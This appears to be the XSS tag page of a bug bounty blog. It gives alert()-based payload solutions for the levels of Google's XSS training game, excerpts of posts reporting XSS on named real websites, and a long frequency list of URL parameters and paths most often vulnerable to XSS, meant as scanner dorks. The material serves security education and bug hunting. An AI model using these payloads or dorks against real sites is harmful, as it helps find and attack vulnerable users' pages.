xss – Open Bug Bounty Blog

Google XSS Game

Posted on May 25, 2021May 25, 2021 by 0xrocky

https://xss-game.appspot.com/

Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page

Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML

Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss

Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')

Testing for XSS (Cross Site Scripting)

Posted on May 25, 2021May 25, 2021 by ShivanshMalik12

Hi, So today ill tell some techniques of testing XSS, First of all these important things you should note: Copy pasting XSS payloads doesn’t work PoC or GTFO Its said like report checkers need a proper PoC for validation of the report, If doesn’t, Your report cannot be triaged. So first, For testing XSS you…

Easy XSS On Mostly Educational Websites Via Moodle

Posted on May 25, 2021May 25, 2021 by darklotuskdb

Many educational websites are using Moodle which is vulnerable to RXSS and according to shodan more than 50K websites are using this technology. Moodle is a learning platform designed to provide educators, administrators, and learners with a single robust, secure and integrated system to create personalized learning environments. This was founded by @PewGrand

How to find AngularJS XSS

Posted on October 26, 2020October 26, 2020 by p4c3n0g3

Have you ever heard about publicwww? It’s a search engine for source code. So publicwww will fnd any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code. They have this list that you can search for: AdvertisingMarketingAnalyticsTechnologiesFrontendWidgetsCMS You can find it here https://publicwww.com. They also have plans and pricing if…

XSS Injection with SQLi

Posted on October 5, 2020 by _r00t1ng_

XSS Injection with SQLi (XSSQLi) XSS Injection with SQLi (XSSQLi) Well After our discussion on different types of injection and places you can find SQL injection Vulnerability, an attacker can successfully exploit and SQL injection vulnerability and get access over the database and if he is enough lucky to get access to the File System…

Using {XSS} to play games on Site

Posted on September 14, 2020September 14, 2020 by _r00t1ng_

Hello guys, today I’m going to teach you how to play inside any website that has an XSS flaw.This technique is more aimed at making fun videos satirizing websites or even playing with your friends… The code is very simple because it only emblems the application of the game in question and an opening of…

JDECO.net XSS Vulnerability| CybeReports

Posted on March 8, 2020March 12, 2020 by CybeReports

The website of Jerusalem District Electricity Company (Arabic: شركة كهرباء محافظة القدس) this XSS sent to us by MD

Stored XSS on h2biz.net

Posted on February 10, 2020February 10, 2020 by 0xrocky

I was surfing the internet when I came across this web portal http://www.h2biz.net which I found to be vulnerable to Reflected XSS. So I attempted to make a Stored XSS because I noticed a kind of message board. I have created a temporary email for registering on the website, then I completed the registration phase….

Top 100 XSS dorks

Posted on December 28, 2019 by devl00p

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerables parameters.

It can be used as a powerful dork list so let’s update your scanners and get bounties!

First here is the list of most vulnerable parameters along with their frequency.

Dork	Frequency
q	5.5%
s	4.5%
search	1.9%
id	1.7%
lang	1.4%
keyword	1.2%
query	1.1%
page	1.0%
keywords	0.8%
year	0.8%
view	0.8%
email	0.8%
type	0.7%
name	0.7%
p	0.7%
month	0.6%
immagine	0.6%
list_type	0.5%
url	0.5%
terms	0.5%
categoryid	0.5%
key	0.5%
l	0.5%
begindate	0.4%
enddate	0.4%
categoryid2	0.4%
t	0.4%
cat	0.4%
category	0.4%
action	0.4%
bukva	0.4%
redirect_uri	0.4%
firstname	0.4%
c	0.4%
lastname	0.3%
uid	0.3%
startTime	0.3%
eventSearch	0.3%
categoryids2	0.3%
categoryids	0.3%
sort	0.3%
positiontitle	0.3%
groupid	0.3%
m	0.3%
message	0.3%
tag	0.3%
pn	0.3%
title	0.3%
orgId	0.3%
text	0.3%
handler	0.2%
myord	0.2%
myshownums	0.2%
id_site	0.2%
city	0.2%
search_query	0.2%
msg	0.2%
sortby	0.2%
produkti_po_cena	0.2%
produkti_po_ime	0.2%
mode	0.2%
CODE	0.2%
location	0.2%
v	0.2%
order	0.2%
n	0.2%
term	0.2%
start	0.2%
k	0.2%
redirect	0.2%
ref	0.2%
file	0.2%
mebel_id	0.2%
country	0.2%
from	0.1%
r	0.1%
f	0.1%
field%5B%5D	0.1%
searchScope	0.1%
state	0.1%
phone	0.1%
Itemid	0.1%
lng	0.1%
place	0.1%
bedrooms	0.1%
expand	0.1%
e	0.1%
price	0.1%
d	0.1%
path	0.1%
address	0.1%
day	0.1%
display	0.1%
a	0.1%
error	0.1%
form	0.1%
language	0.1%
mls	0.1%
kw	0.1%
u	0.1%

This second list is almost the same but with corresponding path :

Dork	Frequency
/?s=	3.6
/search?q=	2.5
/index.php?lang=	0.6
/pplay/info_prenotazioni.asp?immagine=	0.6
/shared/lgflsearch.php?terms=	0.5
/index.php?page=	0.4
/search?query=	0.4
/en/Telefon-Cam?search=	0.4
/index.php?bukva=	0.4
/pro/events_print_setup.cfm?list_type=	0.3
/pro/events_print_setup.cfm?categoryid=	0.3
/pro/events_print_setup.cfm?categoryid2=	0.3
/?eventSearch=	0.3
/?startTime=	0.3
/pro/events_ical.cfm?categoryids=	0.3
/pro/events_ical.cfm?categoryids2=	0.3
/pro/events_print_setup.cfm?month=	0.3
/pro/events_print_setup.cfm?year=	0.3
/pro/events_print_setup.cfm?begindate=	0.3
/pro/events_print_setup.cfm?enddate=	0.3
/search?keyword=	0.3
/?q=	0.3
/search/?q=	0.3
/index.php?pn=	0.3
/?lang=	0.3
/property/search?uid=	0.3
/index.php?id=	0.3
/search?orgId=	0.3
/products?handler=	0.2
/pro/events_print_setup.cfm?view=	0.2
/pro/events_print_setup.cfm?keywords=	0.2
/?p=	0.2
/search.php?q=	0.2
/?search=	0.2
/pro/minicalendar_detail.cfm?list_type=	0.2
/index.php?produkti_po_cena=	0.2
/index.php?produkti_po_ime=	0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE=	0.2
/login?redirect_uri=	0.2
/connexion?redirect_uri=	0.2
/index.php?action=	0.2
/plugins/actu/listing_actus-front.php?id_site=	0.2
/index.php?mebel_id=	0.2
/search/?search=	0.2
/news/class/index.php?myshownums=	0.2
/news/class/index.php?myord=	0.2
/search.html?searchScope=	0.1
/search?field%5B%5D=	0.1
/videos?tag=	0.1
/videos?place=	0.1
/videos?search=	0.1
/?email=	0.1
/?cat=	0.1
/content.php?expand=	0.1
/?page=	0.1
/search/?s=	0.1
/?keywords=	0.1
/search/?keyword=	0.1
/apps/email/index.jsp?n=	0.1
/?name=	0.1
/?sort=	0.1
/search?search=	0.1
/pro/minicalendar_print_setup.cfm?begindate=	0.1
/pro/minicalendar_print_setup.cfm?enddate=	0.1
/pro/minicalendar_print_setup.cfm?keywords=	0.1
/search-results?q=	0.1
/?listingtypeid=	0.1
/search?s=	0.1
/pro/minicalendar_print_setup.cfm?categoryid2=	0.1
/?bathrooms=	0.1
/?listingagent=	0.1
/?featuredsearchseourl=	0.1
/?squarefeet=	0.1
/?siteid=	0.1
/?bedrooms=	0.1
/?featuredsearch=	0.1
/?price=	0.1
/?maxbuilt=	0.1
/?lsid=	0.1
/?listingtypes=	0.1
/?garages=	0.1
/?maxprice=	0.1
/?minprice=	0.1
/?keywordsany=	0.1
/?yearbuilt=	0.1
/?minbuilt=	0.1
/?subdivision=	0.1
/?lotsizeval=	0.1
/?listingstatusid=	0.1
/?mls=	0.1
/firms/?text=	0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET=	0.1
/plan_du_site.php?lang=	0.1
/index.php?Itemid=	0.1
/?view=	0.1
/?t=	0.1
/?selat=	0.1
/?selong=	0.1
/?nwlat=	0.1
/?geo=	0.1

I hope you enjoy this 🙂

Stored XSS

Posted on October 17, 2019October 23, 2019 by 0xrocky

I navigated this website: https://www.edilportale.com, an Italian web portal on construction. I found out that it was vulnerable to reflected XSS, as seen in the image.

Older posts →